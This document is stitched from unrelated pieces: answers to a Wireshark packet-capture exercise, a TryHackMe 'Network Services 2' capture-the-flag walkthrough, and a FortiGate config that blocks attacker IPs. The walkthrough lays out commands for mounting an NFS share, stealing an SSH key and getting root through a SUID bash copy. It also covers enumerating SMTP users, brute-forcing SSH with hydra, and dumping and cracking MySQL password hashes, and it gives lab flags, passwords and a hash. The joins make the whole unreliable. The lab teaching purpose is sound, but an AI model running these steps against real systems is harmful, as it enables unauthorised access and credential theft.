What is the user-agent listed in packet 4?

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040113

Looking at the data stream what is the full request URI from packet 18?

http://pagead2.googlesyndication.com/pagead/ads?client=ca-pub-2309191948673629&random=1084443430285&lmt=1082467020&format=468x60_as&output=html&url=http%3A%2F%2Fwww.ethereal.com%2Fdownload.html&color_bg=FFFFFF&color_text=333333&color_link=000000&color_url=666633&color_border=666633

What domain name was requested from packet 38?

www.ethereal.com

Looking at the data stream what is the full request URI from packet 38?

Refer to the above image for the URI.

http://www.ethereal.com/download.html

Task 12

Before answering, we need to set up the RSA key to decrypt the HTTPS data.

Go to Edit > Preferences > Protocols > TLS > RSA keys list, fill in the blanks as below:

Looking at the data stream what is the full request URI for packet 31?

https://localhost/icons/apache_pb.png

Looking at the data stream what is the full request URI for packet 50?

https://localhost/icons/back.gif

What is the User-Agent listed in packet 50?

Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2

Network Services 2 Room Writeup

TryHackMe: Network Services 2 Room Writeup

Enumerating and Exploiting More Common Network Services & Misconfigurations

Task 2

What does NFS stand for?

Network File System

What process allows an NFS client to interact with a remote directory as though it was a physical device?

mounting

What does NFS use to represent files and directories on the server?

file handle

What protocol does NFS use to communicate between the server and client?

RPC

What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2

user ID / group ID

Can a Windows NFS server share files with a Linux client? (Y/N)

Y

Can a Linux NFS server share files with a MacOS client? (Y/N)

Y

What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.

4.2

Task 3

Conduct a thorough port scan of your choosing, how many ports are open?

In practice, when you use nmap to scan a huge range of ports it can take a very long time. So instead of one huge port range, we can divide it into several ranges to keep each scan short.

nmap -A -p1-10000 10.10.186.1
nmap -A -p10001-20000 10.10.186.1
nmap -A -p20001-30000 10.10.186.1
nmap -A -p30001-40000 10.10.186.1
nmap -A -p40001-50000 10.10.186.1

7

Which port contains the service we’re looking to enumerate?

2049

Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

showmount -e 10.10.186.1

/home

Change directory to where you mounted the share- what is the name of the folder inside?

mkdir /tmp/mount
mount -t nfs 10.10.186.1:/home /tmp/mount/ -nolock
cd /tmp/mount/
ls

cappucino

Which of these folders could contain keys that would give us remote access to the server?

.ssh

Which of these keys is most useful to us?

id_rsa

Can we log into the machine using ssh -i @ ? (Y/N)

cp id_rsa ~
cd ~
chmod 600 id_rsa
ssh -i id_rsa cappucino@10.10.186.1

Y

Task 4

Now, we’re going to add the SUID bit permission to the bash executable we just copied to the share using “sudo chmod +[permission] bash”. What letter do we use to set the SUID bit set using chmod?

chmod +s bash

s

Let’s do a sanity check, let’s check the permissions of the “bash” executable using “ls -la bash”. What does the permission set look like? Make sure that it ends with -sr-x.

chmod +x bash
ls -la bash

rwsr-sr-x

Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Let’s run it with “./bash -p”. The -p persists the permissions, so that it can run as root with SUID, as otherwise bash will sometimes drop the permissions.

ssh -i id_rsa cappucino@10.10.186.1
./bash -p

Now we have a root shell.

No answer needed

Great! If all’s gone well you should have a shell as root! What’s the root flag?

Change to root home directory, then you can find a text file containing the flag.

cd /root
cat root.txt

THM{nfs_got_pwned}

Task 5

What does SMTP stand for?

Simple Mail Transfer Protocol

What does SMTP handle the sending of? (answer in plural)

emails

What is the first step in the SMTP process?

SMTP handshake

What is the default SMTP port?

25

Where does the SMTP server send the email if the recipient’s server is not available?

SMTP queue

On what server does the Email ultimately end up on?

POP/IMAP

Can a Linux machine run an SMTP server? (Y/N)

Y

Can a Windows machine run an SMTP server? (Y/N)

Y

Task 6

First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?

nmap -A -p1-10000 10.10.59.93

25

Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?

If you would like some more help, or practice using, Metasploit, Darkstar has an amazing room on Metasploit that you can check out here:

https://tryhackme.com/room/rpmetasploit

msfconsole

msfconsole

Let’s search for the module “smtp_version”, what’s its full module name?

search smtp_version

auxiliary/scanner/smtp/smtp_version

Great, now- select the module and list the options. How do we do this?

options auxiliary/scanner/smtp/smtp_version

options

Have a look through the options, does everything seem correct? What is the option we need to set?

RHOSTS

Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?

set RHOSTS 10.10.59.93
use auxiliary/scanner/smtp/smtp_version
exploit

polosmtp.home

What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

Postfix

Good! We’ve now got a good amount of information on the target system to move onto the next stage. Let’s search for the module “smtp_enum”, what’s its full module name?

search smtp_enum

auxiliary/scanner/smtp/smtp_enum

We’re going to be using the “top-usernames-shortlist.txt” wordlist from the Usernames subsection of seclists (/usr/share/wordlists/SecLists/Usernames if you have it installed).

Seclists is an amazing collection of wordlists. If you’re running Kali or Parrot you can install seclists with: “sudo apt install seclists” Alternatively, you can download the repository from here.

What option do we need to set to the wordlist’s path?

options auxiliary/scanner/smtp/smtp_enum
set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt

USER_FILE

Once we’ve set this option, what is the other essential parameter we need to set?

set RHOSTS 10.10.59.93

RHOSTS

Now, run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!

use auxiliary/scanner/smtp/smtp_enum
exploit

No answer needed

Okay! Now that’s finished, what username is returned?

administrator

Task 7

What is the password of the user we found during our enumeration stage?

hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.59.93 ssh

alejandro

Great! Now, let’s SSH into the server as the user, what are the contents of smtp.txt?

ssh administrator@10.10.59.93
cat smtp.txt

THM{who_knew_email_servers_were_c00l?}

Task 8

What type of software is MySQL?

relational database management system

What language is MySQL based on?

SQL

What communication model does MySQL use?

client-server

What is a common application of MySQL?

back end database

What major social network uses MySQL as their back-end database? This will require further research.

This question mentions a social network, so the first thing that came to mind was Facebook, and that is indeed the answer.

facebook

Task 9

As always, let’s start out with a port scan, so we know what port the service we’re trying to attack is running on. What port is MySQL using?

nmap -A -p1-10000 10.10.118.254

3306

Good, now- we think we have a set of credentials. Let’s double check that by manually connecting to the MySQL server. We can do this using the command “mysql -h [IP] -u [username] -p

apt install default-mysql-client
mysql -h 10.10.118.254 -u root -p

No answer needed

We’re going to be using the “mysql_sql” module.

Search for, select and list the options it needs. What three options do we need to set? (in descending order).

msfconsole
search mysql_sql
options auxiliary/admin/mysql/mysql_sql

PASSWORD/username/RHOSTS

Run the exploit. By default it will test with the “select version()” command, what result does this give you?

set PASSWORD password
set username root
set RHOSTS 10.10.118.254
use auxiliary/admin/mysql/mysql_sql
exploit

5.7.29-0ubuntu0.18.04.1

Great! We know that our exploit is landing as planned. Let’s try to gain some more ambitious information. Change the “sql” option to “show databases”. How many databases are returned?

set SQL show databases
exploit

4

Task 10

First, let’s search for and select the “mysql_schemadump” module. What’s the module’s full name?

search mysql_schemadump

auxiliary/scanner/mysql/mysql_schemadump

Great! Now, you’ve done this a few times by now so I’ll let you take it from here. Set the relevant options, run the exploit. What’s the name of the last table that gets dumped?

use auxiliary/scanner/mysql/mysql_schemadump
exploit

x$waits_global_by_latency

Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better… search for and select the “mysql_hashdump” module. What’s the module’s full name?

search mysql_hashdump

auxiliary/scanner/mysql/mysql_hashdump

Again, I’ll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?

use auxiliary/scanner/mysql/mysql_hashdump
exploit

carl

Another user! And we have their password hash. This could be very interesting. Copy the hash string in full, like: bob:*HASH to a text file on your local machine called “hash.txt”.

What is the user/hash combination string?

carl:*EA031893AA21444B170FC2162A56978B8CEECE18

Now, we need to crack the password! Let’s try John the Ripper against it using: “john hash.txt” what is the password of the user we found?

john hash.txt

doggie

Awesome. Password reuse is not only extremely dangerous, but extremely common. What are the chances that this user has reused their password for a different service?

What’s the contents of MySQL.txt

ssh carl@10.10.118.254
ls
cat MySQL.txt

THM{congratulations_you_got_the_mySQL_flag}

Blocking requests from malicious IPs to a FortiGate firewall

Description

Attackers send requests to the public address of the FortiGate firewall, for example attempting to establish an IPsec VPN connection with the device. A local-in-policy can be used to filter the public-facing interface and reject inbound traffic from malicious IPs.

Configuration example
config firewall local-in-policy
    edit 0
        set intf "port2"
        set srcaddr "attackers"
        set dstaddr "all"
        set service "ALL"
        set schedule "always"
    next
end

This blocks inbound traffic from the source IPs in the attackers address group to the port2 interface.